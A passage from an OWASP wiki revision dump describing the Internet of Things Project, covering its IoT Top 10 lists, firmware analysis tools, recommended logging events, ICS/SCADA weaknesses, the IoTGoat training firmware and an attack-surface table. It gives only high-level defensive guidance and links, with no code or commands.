* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=250073OWASP Internet of Things Project2019-04-12T20:37:13Z<p>Aaron.guzman: /* Internet of Things (IoT) Top 10 2018 */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. Typically, lists have shortcomings that are unable to cover each aspect of an IoT environment. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. <br />
<br />
{{Social Media Links}}<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
